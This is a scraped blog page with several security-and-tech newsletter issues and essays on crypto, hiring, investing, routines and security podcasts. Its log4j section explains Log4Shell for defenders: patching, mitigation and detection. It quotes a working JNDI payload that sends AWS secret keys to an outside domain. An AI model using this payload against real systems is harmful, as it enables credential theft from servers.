Daniel Miessler's Blog, page 41

[image error]

SECURITY NEWSWeb3 and NFT Analysis — Moxie Marlinspike wrote a brilliant piece last week on Web3 and NFTs. Web3 is such a major topic I thought it was worth covering in-depth and in the security section. The biggest point of his piece, at least to me, was that there’s generally no mechanism for ensuring the integrity of NFTs. He created his own example NFT which was just a link to a web server, and then he proceeded to modify and delete what existed there. The result was that he could have an NFT in a wallet one moment, delete it off his server, and the NFT would disappear from the wallet! The second major point, which is larger in scope, is that Web3 is all based on servers, not on clients, and people don’t want to run their own servers. This means there will be tremendous pressure for big companies to run most of the servers—aka most of Web3. The overall takeaway for me was very “I don’t think that word means what you think it means” in the sense that most people believe blockchain and Web3 have this powerful integrity built-in. Right now. Today. Moxie demonstrated very clearly, both with prose and with examples, that this is not the case. This doesn’t mean Web3 is lost by any means, but it does give one pause when hundreds of billions of dollars are being thrown around in NFTs and Web3 based on assumptions that aren’t currently true. More | One Response to Moxie

A North Korean cyberespionage group called Konni has been linked to attacks on the Russian Federation’s Ministry of Foreign Affairs. These attacks started with credential stuffing and then loading malware to steal intelligence. More

Venture funding in the cybersecurity space crossed $20 billion in 2021, and the last quarter set a new quarterly record of $7.8 billion. More

Part of the Pegasus spyware package has been uploaded by a security researcher to Github. More

QNAP has warned its users to get its NAS devices off the internet, and it’s given instructions on how to do so. This comes after months of repeated vulnerabilities affecting the devices. More

SSH 8.9 will include agent restriction, which will have two main functions: “a safe runtime store for unwrapped private keys, removing the need to enter a passphrase for each use, and a way to forward access to private keys to remote hosts, without exposing the private keys themselves.” More

The US military is working hard to counter the threat posed by hobbyist-level drones. The problem is that they’re both small and cheap, and you can strap explosives to them. Possible solutions range from lasers to microwave blasts. More

Vulnerabilities: VMware has patched a bug affecting ESXi, Workstation, and Fusion | System Takeover More WordPress has been updated to address multiple vulnerabilities | DoS MoreIncidents:  The New York State Office of the Attorney General has warned 17 companies that 1.1 million customers have had their accounts compromised using credential stuffing. MoreCompanies: Google has purchased Siemplify—a late-stage Israeli company in the SOAR space—for around $500 million. More
TECHNOLOGY NEWSApple has become the first company to hit $3 trillion dollars in market cap. It was also the first to hit $2 trillion, and if it has any success with a rumored headset and car, it’ll probably be the first to $4 trillion. I attribute a lot of this to Tim Cook and his expertise in managing a supply chain. More

GameStop is getting into NFTs. More

Blackberry devices stopped working on January 4th. For real this time. More

OpenSea, the largest NFT trading website, is now valued at $13 billion dollars. More

Twitter is rolling out a new test feature where people do video reactions to tweets, like TikTok. More

It’s been 15 years since Steve Jobs revealed the iPhone. I remember where I was that day, and what I was doing. It was a big day for me, and it lead to me becoming an Apple person when I was not at all before. More


HUMAN NEWSA record 4.5 million Americans quit their jobs in November. The number of open positions fell from 11.1 million to 10.6 million in October. More

Between 2009 and 2018, the proportion of adolescents reporting having no sexual activity (including masturbation) rose from 29% to 44% among men, and from 50% to 74% for women. More

The Mayo Clinic fired 700 unvaccinated employees due to noncompliance with vaccination policy, which is around 1% of its workforce. More

A nasal spray that prevents dementia is moving into human trials. It combines an antibiotic and resveratrol to combat plaques in the brain that are known to be associated with cognitive decline. More

1 out of every 153 American workers works for Amazon. More


CONTENT, IDEAS & ANALYSIS

The Unsupervised Learning Everyday Carry — Many have asked what my EDC is, i.e., what tools and gadgets I keep on my person and use every day. This member-only post answers that question and goes into why I use each item. More

Mentor vs. Nemesis — I enjoyed this piece on how many great people weren’t encouraged by mentors as much as they were energized by a nemesis. I see this dynamic a lot in life, where there is a health tension and competition between friends and peers in a particular space. The bug bounty space is a great example, where you have a lot of very smart hackers and creators putting out content. They’re friends, but they’re also competing. And some of them have one or more nemesis’ that drive them to be better. I’m not sure the right balance of positive and negative—of push and pull—but I do think that it’s natural to be driven by negative competition. I personally use a different tactic, which is competing with the best in the world, including people who are dead, and demanding that I get to that level.

The Usefulness of “Prepping” — A Tucker Max blog post about prepping blew up recently. It’s all about what you need to truly get ready for a massive crash, and what actually won’t work even though people think it will. I thought it was a good piece and it echoed my thoughts on the topic. The most important of which was that if you don’t have a community defense strategy, you don’t have a survival strategy. Meaning, you can have all the food stores you want, but if you can’t defend them from a group of men with guns, you don’t have much. My current methodology isn’t much modified by the piece, i.e., having enough to escape and survive for a few weeks while things go back to normal after a natural disaster or something similar. I still contend that if the US or the world economy fails, there’s nothing my bugout bag is going to do to help me. For that, you basically need a place in Idaho to meet your friends and start a new civilization. Note: a lot of the prediction and political stuff in the piece, I just don’t agree with. But I did find the preparation stuff thought-provoking. More

I vs. T-shaped People: Which Are Better For Which Jobs? — This was an interesting piece and discussion on Hacker News about someone who typically looks for I-shaped people (narrow and deep) vs. T-shaped people (broad and shallow), but who also happened to notice that most of their best projects had a good mix of both. I tend to look for people who are unicorns in this way: being mostly T, but with one or two I-like areas.


NOTESNot sure who’ll notice, but I simplified the newsletter design for this episode, especially around the header. If you noticed and cared, let me know what you think.

We had a great UL Book Club today discussing Good Strategy, Bad Strategy. The next book has been chosen and we even have the next couple picked out after that. Great discussion today, and can’t wait for the next one! 

I continue to struggle with blatant plagiarism of my content online and am looking for a solution to it. If you all know of anything, please let me know. More SPONSORED DISCOVERY

PlexTrac: The Purple Teaming Platform
 PlexTrac is the premier cybersecurity reporting and workflow management platform. With PlexTrac, security service providers and teams of all sizes can cut report writing time in half, streamline workflows, improve collaboration and communication, and gain a real-time view of their security posture.

Head over to PlexTrac.com/UnsupervisedLearning to download our Writing a Killer Pentest Report white paper to learn how PlexTrac helps cybersecurity practitioners produce quality work faster so they can focus on winning the right battles Download the Whitepaper
DISCOVERYI just bought a couple of these masks, which came highly recommended by Clive Thompson. We’ll see how they do I’ll report back. More

My Personal Notetaking Journey More
The Rise of Performative Work — “It’s not what you do. It’s how ostentatiously you do it.” More

Ethereum’s Reference on Smart Contract Security More

AI is Eating The World’s Workforce With Job Automation More

6 Ways to Delete Yourself From the Internet More

GovInfo RSS Feeds — A massive list of RSS feeds that let you track what the government is doing, from bills to budgets to congressional committee meetings, and more. More

The Wall — Near-real-time animations of geostationary satellites. More

Keyboard Drill — An elegant website that helps you learn to type faster. You give it a target WPM, and it drills you until you get that fast on various words. More

ffuf — My favorite web fuzzer, which is written in Go. More

nuclei — The future of vulnerability scanning (in my opinion). It’s YAML-based signatures for finding issues across multiple protocols. More

nuclei templates — A repository of check types that can be used with Nuclei. More

A TomNomNom Recon Tools Primer — A previous post of mine going over my favorite recon tools from @TomNomNom. More


RECOMMENDATIONSpend this time in January to lock in a solid daily routine. As James Clear says in Atomic Habits. We don’t rise to the level of our goals; we fall to the level of our systems. That means you need a good system. This is mine, which I spent like a week researching and writing during the holiday break. But it doesn’t matter so much which one you use. It matters more that you actually have one, and that you use it rather than relying on luck or hope. Find an algorithm that will get you to where you want to be, and follow it.


APHORISM“The three most harmful addictions are heroin, carbohydrates, and a monthly salary.”

— Nasim Taleb

This is UL Member Content

Subscribe

Already a member? Login

This is UL Member Content

Subscribe

Already a member? Login

This is an internet re-post of a piece by Bryan Goldberg that is no longer available online.

–

by Bryan Goldberg

About a year ago, my sales operations team needed to hire an Account Manager. We had a handful of candidates in the interview pipeline, but one of them had far more relevant experiences than the others. So we interviewed him first, in hopes that it might save us a bunch of time.

He passed the first wave of the gauntlet, earning positive marks from a Director in our group, and he was also well-reviewed by the peers who he would be working alongside. “He’s been doing this for five or six years, and he can definitely achieve what we need from him,” was the consensus.

But then it was time for him to interview with me. I didn’t ask him very many questions about sales, advertising operations, invoicing, collections, or any of the handful of other tactical skills we wanted. I just grilled him on the bottom fourth of his resume — you know, the one about hobbies and college.

And when I asked him about his BA in English, which he had earned about five years earlier, he got nervous. “What was your favorite century of English literature,” I asked. But he hadn’t really focused on any particular era. Nor did he have an opinion.

“Did you have a particular affinity for poetry, drama, old novels?” He punted on that one too.

“Well, what was your favorite book? Or your favorite author?” He stared at me somewhat blankly.

“Oh, well, there were a bunch. None that really jump out at me right now. It was kind of a long time ago, you know? My memory is a bit hazy,” he said with a chuckle, before talking about how fun college was. I laughed politely, wrapped up the interview in 15 minutes, and informed the team that we would not be hiring this candidate.

Many fine professors and senior executives have written books about team-building and how to be a great manager. At some point, I will write about this meaty topic for PandoDaily. But here’s an amuse bouche until then:

Don’t hire losers.

They might be able to do the job for which they are hired. But that is not good enough. Especially at a startup where you are able to hire a lot fewer people than you would like.

As it turned out, we eventually did find someone for that position, with a lot less relevant experience. But she learned the job in about six weeks, and her upside enabled her to take on a lot of the unforeseen — and valuable — tasks that the previous candidate would have stumbled around.

And the good news is that it’s really easy to detect losers. Here are some things you can ask a potential candidate to find out:

“Tell me about what you studied in college, and what were some of your favorite classes?” A person who spent $120,000 and dedicated four years of their lives to any pursuit better be able to speak eloquently for five minutes on that humongous experience. Or else they are a loser.

“Tell me about your hobbies…” A person who has no hobbies, and can’t even exaggerate one, almost certainly lacks the ambition to make your company valuable. They are probably a loser.

“So, what do you think about our website?” If the applicant hasn’t performed even the most basic due diligence in preparation for the interview, then they have no common sense. And if they are too weak to offer an opinion on a matter, that is a huge negative. There’s a Smash Mouth song about people like that.

“Which of your previous jobs did you enjoy the most?” Applicants screw up this question so often, you’d think that you were quizzing them on Fermat’s Last Theorem. How can you know if they are a fit for your work environment, when they can’t even tell you about a work environment that appeals to them? There’s a Beck song about people like that.

These sorts of questions are great, because they can help identify winners even amongst the nervous, “I don’t interview well” types of people who may warm up and shine on the job. And I’ve hired a lot of great people who don’t interview especially well. But when I jump into the above questions, they are able to speak eloquently to how dynamic and thoughtful they are as people.

Lesser managers will try to stump candidates with horrible brain teasers along the lines of “Describe a time you got into a bad situation and resolved it effectively?” — or crap like that. Those questions are not necessary. All you will do is filter out some good people who have not yet mastered the art of the interview.

But if a candidate can’t even tell you why they liked their last job, or what they got out of their college experience, or any of the million other questions that speak to their basic humanness… Then no amount of experience will make them valuable.

They are losers. They are out there. And you should not hire them.

–

NotesIf Bryan Goldberg ever brings this post back online at a new site, I will remove this version.Image by Hallie Bateman.

First off, nobody has any idea what’s going to happen. Let’s be clear about that. These are musings—nothing more.

I see the current crypto hype as three distinct phenomena—with descending levels of longevity.

The IdeasThe TechThe HypeThe ideas

I think the ideas are most likely to survive for decades, which are:

A digital replacement for reality where the other 80% can find meaning away from meatspace (metaverse)A shared, decentralized computer (Ethereum/et al)Removing the middleman (de-$FOO)Decentralized finance (defi)Smart contracts Digital validation of ownership (NFTs)Decentralized and autonomous organizations (DAOs)The tech

The next most fragile in this list is the technology itself. So, blockchains. Bitcoin. Ethereum. NFTs built on top of current blockchains. Etc.

There’s no way to know if the current iteration is stable, or if it’ll completely fail in a few months/years, cause a new Dark Ages for these ideas, and be resurrected in 5-20 years when the tech or society is ready.

Many of the ideas above can be implemented using existing, non-crypto technologies, so there’s no reason to assume that crypto is an inevitability.

The hype

The most fragile of all these is the hype, which is not sustainable. The number of companies being formed right now that are raising billions of dollars in “value”—all based on mania and FOMO—is completely insane.

There’s no way the top of this doesn’t blow or slide off within 1-3 years. Even if this first iteration IS THE ONE, we’d still see consolidation at the top that removes 60-95% of the players from the board.

The predictions

There are obviously more than two options.

OPTION 1 — We get it right the first time with Bitcoin/Ethereum, and society is reshaped in the image of decentralization, smart contracts, and digital ownership. Many lucky entrepreneurs become owners of billion and trillion-dollar companies in the course of the next 10 years. Massive consolidation happens, and something like 2-5% of the coins/chains survive.

OPTION 2 — The whole thing fizzles out in the next several months to a couple of years. Either regulation, performance issues, or vulnerabilities basically kill off Bitcoin and Ethereum, and they take down the entire ecosystem with it. It’ll be like the AI Winter of the 1970’s, except for crypto. But the ideas above survive, and they start getting implemented in 5-10 years using traditional, non-crypto-based technologies. Somewhere around 10 years later another hype cycle may start around crypto, depending on how successful the implementation of the ideas was using non-crypto tech.

I’m personally betting on #1, but I’d not be surprised at all if #2 happened.

The only thing I’m highly convinced of is that the Ideas will not die. I believe they’ll keep re-emerging as themes regardless of whether they’re implemented using crypto or traditional technology.

People have been talking about a stock market crash correction for years now, and for good reason. We’ve seen massive growth for years that’s usually followed up by a drop (see above).

But I’m tracking another narrative that’s pretty damn compelling—namely the narrative of “So what?” If you draw a line through that graph—including all the crashes—it’s absolutely heading upwards.

Simple doesn’t always mean right.

So my read on this is pretty simple: Yes, we might have a correction soon, in fact we should expect one. But that doesn’t mean you shouldn’t be in stocks.

The only question is how long you plan to be in the game.

If you are trying some sort of scheme to get rich quickly, with this stock or that stock, yes—you might get burned by a correction. But if you’re buying solid stocks, or index funds, and you plan on holding them for 10, 20, or 30 years, I think the data shows you’re pretty safe.

We’ve seen lots of market crashes, but not a single one that wasn’t followed by stocks hitting new highs.

Now keep in mind—this doesn’t account for a total collapse of the economy, or the downfall of the United States, or the end of civilization. There are no guarantees that past trends will continue.

My only point here is to not be overly concerned about the trend of corrections, becase that trend sits within the trend of recoveries that take stocks even higher.

SummaryPeople think we’re likely to see a correction in stocks soon.The data show that this is likely, although nobody knows when it will be.Some think this is a reason to avoid stocks.I and others think a correction is not only likely, but virtually guaranteed, and that this is only scary if you are working some sort of short-term scheme.If you are investing in the stock market longterm, using strong stocks and/or index funds, you will likely survive this coming dip to see the other side.

I’ve been anti-new-years-resolutions for a while now.

My reason is simple: I don’t like gimmicks. And that’s what most resolutions are. They’re nice stories that people tell themselves about how they’ll be better next year.

Here’s the simple truth about these types of resolutions: If you had the ability to eat less, or exercise more, you wouldn’t wait until the end of December to make those changes. Anyone capable of such discipline would make the change immediately—not at the end of the year.

But it’s not all bad news for next-year planning. I think there are a few tasks that fit well with an annual cadence, and you might as well get them done between December 15th and January 1st when you have some downtime to reflect.

My annual life optimizations

You don’t rise to the level of your goals; you fall to the level of your systems.

James Clear

This isn’t the same as buying a gym membership; it’s a commitment to a schedule.

Optimize your daily routine and commit to staying with it. I just redid mine and published it here.Make sure your life is backed up, and that you have functioning auto-backups in place.Get to a zero inbox. I use Superhuman, so that includes all Starred email too.Make a list of the people you should be interacting with regularly in the coming year. This means taking people off the list and adding others. The criteria will be different for everyone, but I recommend something like the following:

It’s harsh, but in order to be great you need to limit the type of energy you’re absorbing from the people in your life.

Drop people who are negative or toxic, and who are unwilling to put in the work to improve themselves. Add a few people who work harder than you and/or have some measure of success that you wish to achieve.Add a few people who are up-and-coming grinders who could benefit from your position and knowledge.

So, cut the negative people, find some people who push you, and find some people to help on their journeys.

This is my longer list.

Review your evergreen books. Bring up your most important books, or at least your favorite passages from them, and re-absorb them. Mine short(er) list of favorites includes:Atomic HabitsMeditationsNever Split the DifferenceA Guide to the Good LifeThe Evolution of Everything

I don’t generally have time to re-read all of my favorites, but I use Kindle Highlights (and now Readwise) to review my favorite snippets. If you don’t have your books marked up in this way, take this opportunity to do that.

SummaryResolutions are fantasies.Use the time to perform annual tune-ups on your systems instead.Update your daily routine with what you’ve learned in the last year.Make sure your most important text, documents, and images are backed up properly, with automation.Manicure the list of who you’re going to associate with this coming year.Re-consume and re-process your favorite wisdom from your favorite books.

I hope you have a wonderful 2022.

NotesMake sure your routine includes regular pings to people you care about tell them that they’re awesome, and that you care about them.

I get asked a lot what my go-tos are for security content. My top four recommendations are Darknet Diaries, Risky Business, Unsupervised Learning (yes, my own show), and TL;DRSec.

As for including my own show, I’m too old and well-read for false humility or arrogance.

What’s so interesting about these four is how different they are. I did this analysis so I could capture what I cared about and how each of them provides those items in different amounts—which allows me to make better recommendations to people.

Here’s my analysis and summary.

Show identityDarknet Diaries is, first and foremost, a storytelling podcast. It is, without question, the best produced and executed podcast in security, and arguably anywhere. It has the quality level of a professional podcast series put out by NPR or the New York Times. But it isn’t just production quality—it’s the quality combined with the content. Jack dives deep into fascinating stories and topics like a combination of Columbo and Malcolm Gladwell, pulling threads and peeling layers and describing the process as he goes. This podcast should have a warning label for anyone doing any other profession when they start listening, because a few episodes of this show might make them want to start a career in security.Risky Business is a security and hacking news show, with a secondary note of vendor exposure and education. Patrick applies his journalism background to cover security stories in an entertaining way, especially when he’s accompanied by his regular partner, Adam Boileau, who is a professional penetration tester. Patrick is from Australia and Adam is from New Zealand, so they’re both cheeky, which keeps their rendition of security news not just informative but also entertaining. They also have regular interviews with interesting people, and have sponsor slots that expose the audience to new security companies and their tools. Risky Business is—at least in my circles—the most known and most popular security news podcast.Unsupervised Learning is a show that explores the patterns in security, tech, and society. My primary emphasis for this show is efficiency, i.e., giving people as much quality information and ideas as possible in the shortest amount of time. The broader scope of the show is polarizing because it’s not a pure security show, or a pure tech show, or a pure show about society. Patrick from Risky Business once told me it was a “thinking podcast”, which I’ll happily accept. Think of it as a zoomed-out view of what’s happening in security, tech, and society—combined with analysis, original thinking, and a Discovery section that lists the best stuff I’ve found in my reading from the last week.TL;DRSec is a newsletter centered around security research. Clint applies his academic background (he actually has a Ph.D. but never mentions it), to find and summarize the best security tools and presentations. Many newsletters have sections for tools, including my own, but Clint’s is the best because it’s his entire focus. Many of the tools he covers are centered around cloud security, but he often has sections for network security, mobile security, and many other areas. As I’ve said before, Clint’s is the one security newsletter that I will not skip a week on, and will not stop until I’ve read the entire thing. I open more links in his newsletter than for any other.Analysis

So, since this is all about recommendations, let’s look at the attribute breakdown and see what we can learn.

One thing that jumped out at me was that Darknet Diaries had really low scores in a lot of areas I care about, but it was the only show with 10s. And it had two of them. I like this. It means it knows what it is and it leans heavily into that. Like I said, if you’re up for being entertained and educated about the world of hacking, there is simply nothing better.Coming less from the scorecard, I’ve found there are generally two types of people when it comes to podcasts: people who need to be entertained to listen, and people who are simply searching for nuggets they can use elsewhere. I am in the second category, which is why I built a show around that. But if you’re looking for humor and entertainment, I’d say you should move towards Risky Business and avoid Unsupervised Learning. And if you’re looking for a super-efficient (but somewhat antiseptic) injection of content/ideas, I’d say go with UL. Note that TL;DRSec doesn’t have a podcast, so it’s not really rated on this count.One thing that Risky Business has that Unsupervised Learning and TLDRSec doesn’t have, is a strong sense of attacker activity. With Patrick’s curiosity and Adam’s pentesting focus, they aren’t just talking about what happened but they also focus on linking the activity to a given threat actor, and mentioning other attacks they’ve been associated with. If you like being up to speed on what the bad guys are doing, from a security news perspective, Risky Business definitely has that covered. Darknet Diaries does that as well, but at a much narrower scope and in much more depth. Unsupervised Learning, over the course of a year, ends up being less like a security show and more like a thinking and analysis show from the perspective of a security professional. Like I said, that’s either good or bad, depending on what you’re looking for. The show attempts to give not just the stories and the details, but the context and patterns and impact that they have on our lives. That’s the goal anyway.TL;DRSec is highly focused on exposure to great research and does a really good job of highlighting the people behind that work. Clint is an extremely kind and positive person, and it shows in his newsletter. He is constantly lifting people up, exposing their work to people who might be interested, and making connections people with similar interests. You can think of Clint as a security research maven who is the most aware person out there of what people are working on. Combine that with his own technical expertise and you have a brilliant guy and a wonderful newsletter.SummaryThese are my top four recommendations for people to read or listen to within security.They are very different.Darknet diaries you have to listen to regardless. End of story.Listen to/read Risky Business if you like Aussy/Kiwi snark combined with in-depth coverage of attacker groups.Listen to/read Unsupervised Learning if you want security news combined with context, ideas, and analysis of how it impacts us as humans.Read TLDRSec if you want the best exposure to the best security research, delivered in a positive and uplifting way.

I hope this helps you.

NotesThe original version of this piece had Adam as Australian. Apologies.

If you’re reading this you’re underslept and over-caffeinated due to log4j. Thank you for your service.

I have some good news.

I know a super-smart guy named d0nut who figured something out like 3 days ago that very few people know.

Once you have 2.15 applied—or the CLI implementation to disable lookups—you actually need a non-default log4j2.properties configuration to still be vulnerable!

Read that again.

The bypasses of 2.15 and the NoLookups CLI change don’t affect people unless they have non-defalt logging configurations. From the Apache advisory:

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern. Apache Project Security Advisory

“Certain non-default configurations”. I’ve never heard a sweeter set of syllables.

These can also be set in log4j2.xml or programatically.

So you need to have changed your configs to include patterns like:

$${ctx:loginId}${ctx${event${env

…etc to be vulnerable to a 2.15 patch level or a log4j2.formatMsgNoLookups or LOG4J_FORMAT_MSG_NO_LOOKUPS = true bypass!

That’s huge! And Nate figured this out like 4 days ago!

Just to point out to those panicking about this right now: this is a very uncommon situation to be vulnerable from this cve in a “readily exploitable from the internet” way.

Look for ${event:Message} or ${ctx:*} in your log4j2 properties or xml files

— d0nut (@d0nutptr) December 15, 2021

He mentioned to me multiple times this wasn’t as bad as people thought, but he wasn’t shouting from the rooftops so I didn’t listen well enough. Shame on me.

He also happens to have a strong meme game.

POV: you follow me pic.twitter.com/Xw33fmji1A

— d0nut (@d0nutptr) December 15, 2021

SummaryThe first vuln was just as bad as everyone thinks it is. Or worse. It did not require this non-default logging configuration.But if you are patched to 2.15, or mitigated with the NoLookup config, you are no longer vulnerable unless you ALSO have a logging config option set in your log4j2.properties file that re-enables them.So, if you’re already patched to 2.15 and/or have the mitigation in place, and don’t have non-standard configs—which you should confirm—you might be able to sleep for a bit.And of course of course—keep in mind that this all only pertains to vulnerabilities we know about today. And the internet moves fast.Finally, d0nut is awesome and you should follow his work.NotesThis also applies to the DoS that 2.17 addresses.Thanks to Nate for the great find!

[image error]

SECURITY NEWS

The log4j (Log4Shell) Situation 

What Happened: A 0-day exploit was released for log4j—a Java-based logging utility that’s part of the Apache Logging Services project. It is used by millions of systems worldwide to process logs. 

Impact: People are comparing this to Heartbleed, but it’s much worse in a number of ways. While Heartbleed affected all TLS implementations, and this one only affects systems that use log4j, this issue produces direct and immediate harm in the form of password/key extractions and shells.

This vulnerability will be with us for years because malicious payloads and vulnerable systems can sit dormant for any amount of time. At any moment they can come back alive and process a malicious payload that results in compromise.

How it Works: The vulnerability is due to insecure “lookup” functionality within log4j that executes user-provided content as code, also known as RCE. So if you provide the input  `${env:PWD}`, it’ll write the PWD environment variable to the log. It gets much worse from there, including the egressing of data out of the affected system and—most importantly—spawning a shell on the affected system.

Example: Here’s an example from @dildog of extracting AWS Keys and listening for incoming requests. 

${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.mydogsbutt.com}

What to Do: The best way to fix this is to find all your instances of log4j and patch them to 2.15+. If you can’t do that, there are a few possible mitigations: Patching: Upgrade to version 2.15.0. Mitigation: For those who cannot upgrade to 2.15.0, in releases >=2.10, this vulnerability can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
Note: WAF can help but won’t solve the problem. Most companies’ backend systems are already clogged with these malicious payloads, from multiple ingress points. We can’t fix the problem by stopping more from coming in. The only fix is securing the systems that will inevitably come in contact with that malicious input. Detection: I know many companies using Semgrep to find vulnerable inclusions of user-provided data. Here’s an example Semgrep rule I got from Clint Gibler of R2C/TLDRSec.  Vaccination: This is definitely on the crazier side of things, but one clever approach is to use the vulnerability to mitigate the vulnerability. Specifically, it’s using the RCE functionality to set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. | Code via Cybereason Other Considerations: As David Litchfield pointed out in a number of tweets, this isn’t just HTTP. Any service you have that takes input, including SMTP, IMAP, etc., are all additional attack vectors. Also consider second and N-level order processing of content on the backend as part of batch processes and other types of automation.Analysis: What’s so remarkable about this vulnerability is not just its criticality or reach—but the root cause at the developer incentives level. Like Heartbleed—the project had very few eyes on it, and all those eyes were volunteers. What we should be thinking about isn’t just log4j. What we should be thinking about is how many other projects are out there that have similar characteristics: The project is maintained by very few people in their spare time for no money, and If the project had a major issue it would disrupt the entire internetWe simply have too much critical internet infrastructure maintained by a handful of people in their spare time. And those few people are often not able or incentivized to evaluate what they’re creating from a security standpoint.

This is not their fault. They’re heroes for keeping the lights on. It’s our fault because we know how bad the situation is and we just YOLO through life as if we didn’t. The result is that we get to learn about internet-stopping vulnerabilities from the Minecraft community.

—

The FBI says a ransomware gang out of Cuba has been launching ransomware attacks against US critical infrastructure. They’ve released IoCs to help others find attacks from the group. More

The FTC says Americans lost $148 million to gift card scams in 2021. More

Attackers are using the log4j vulnerability to install malware, including cryptominers and Mirai and Muhstik botnet clients. More

QNAP says there’s new cryptominer malware targeting vulnerable QNAP NAS devices. More

CIA Director William Burns said on Monday that the CIA “has a number of different projects focused on cryptocurrency”. He went on to say, “My predecessor had started this, but had set in motion a number of different projects focused on cryptocurrency and trying to look at second and third-order consequences as well and helping with our colleagues in other parts of the U.S. government to provide solid intelligence on what we’re seeing as well.” More

Incidents: Volvo says attackers have stolen research and development information after hacking some of its servers. More Marriot has suffered another data breach affecting 5.2 million guests. MoreVulnerabilities:  log4j Critical RCE | Critical | RCE More Sonicwall VPN Bugs in SMA 100-series Devices | Critical | RCE More 4 WordPress Plugins | Critical | 1.6 Million Sites Affected | More Mozilla Firefox and Thunderbird | High MoreCompanies: Incode raises $220 million to do identity verification and authentication. More
TECHNOLOGY NEWSDeepMind has revealed a new 280 billion parameter language model called Gopher. More

Italy has fined Amazon $1.3 billion for abusing its market position. More

Over 200 US newspapers have filed suit against Facebook and Google for monopolizing digital ad revenue—and by extension—online news. More

Meta has released Horizon Worlds, its social virtual reality space, to the world after more than a year in private testing mode. The platform functions much like Roblox in that you can create your own games within the base game. You currently can’t make money from your own games, but you can enter creator competitions and win money that way. More

Sports streaming is starting to intersect with sports betting, and Disney is deep into it. It’s the combination of watching sports with your friends and betting at the same time. More

People have spent $27 billion on NFTs in 2021 so far. Cryptopunks are the most popular collection with $3 billion in sales. More


HUMAN NEWSEvergrande is a massive real estate company in China with over 200,000 employees, and it has defaulted on over $300 billion in outstanding liabilities. Beijing has intervened to prevent a collapse of the company. More

A new paper in Nature finds that exercise plasma boosts memory and dampens brain inflammation in mice. Interestingly, it shows that that plasma can be transferred to other mice, where they see the benefits as well. More

New research shows that Covid attacks fat tissue, which could be why obese people have been at higher risk of severe illness and death. More

Germany reported 70,000 new Covid infections last Wednesday, along with 534 deaths. These are the highest numbers in the country since February. More

60% of Republicans are confident in doctor’s advice, down from 73% in 2010. More


CONTENT, IDEAS & ANALYSISThe Vigilant — We should have a new internet group called The Vigilant—a group of open-source code maintainers that steward and protect our top 1000 open-source applications. Read the Blog


NOTESI was sad to hear that Anne Rice has died. She was 80. More than vampires, she gave me a love for New Orleans. So much so that when I visited it, it seemed somewhat familiar. She’ll be missed. More

I’m really looking forward to taking some time off soon around the holidays. I have a good amount of content that’s around 60-80% done, and I want to get it all over the line by January 1st. 

Thanks to Caleb Sima for input into my log4j analysis above.


DISCOVERY  

Ben Evans put out the latest version of his annual presentation on technology trends, and it’s remarkably good as usual. Covers the rebranding of Web 1, 2, and 3, Crypto, VR/AR, NFTs, and so much more. More

Ryan Holiday’s 9 Rules for a better life. More

A Semgrep rule for detecting insecure log4j logging. More

“This week the internet has learned—once again—that asset management is the center of security. It’s hard to patch what you can’t find.” — Daniel Miessler

“The most consequential figures in the tech world are half guys like steve jobs and bill gates and half some guy named Ronald who maintains a Unix tool called ‘runk’ which stands for Ronald’s Universal Number Kounter and handles all math for every machine on earth.” — Druthers Haver

StopLyingCloud — An honest AWS service health dashboard. More

Amazon Brand Detector — A Chrome extension for detecting which products on Amazon are Amazon-owned. More

TimeandDate — A tool for seeing where planets are visible in the night sky where you live. More

Diagrams — Draw cloud system architecture diagrams using Python code. More

Log4Shell Recon and Post-Exploitation Network Detection — A collection of detection rules and IOCs by NCC. More | by NCC Research

Log4jAttackSurface — A Curated List of Companies and Technologies Affected by Log4Shell More | by YfryTcshsGD

Border Collie — Uses Semgrep and watchdog to detect reverse shells in your environment. More


RECOMMENDATIONS

Many people in tech have been working tirelessly since Thursday on Log4Shell. If you have any authority or influence to help them at work, make sure they get some public love within the organization, along with some extra time off. 


APHORISMS“We don’t rise to the level of our goals. We fall to the level of our systems.”

James Clear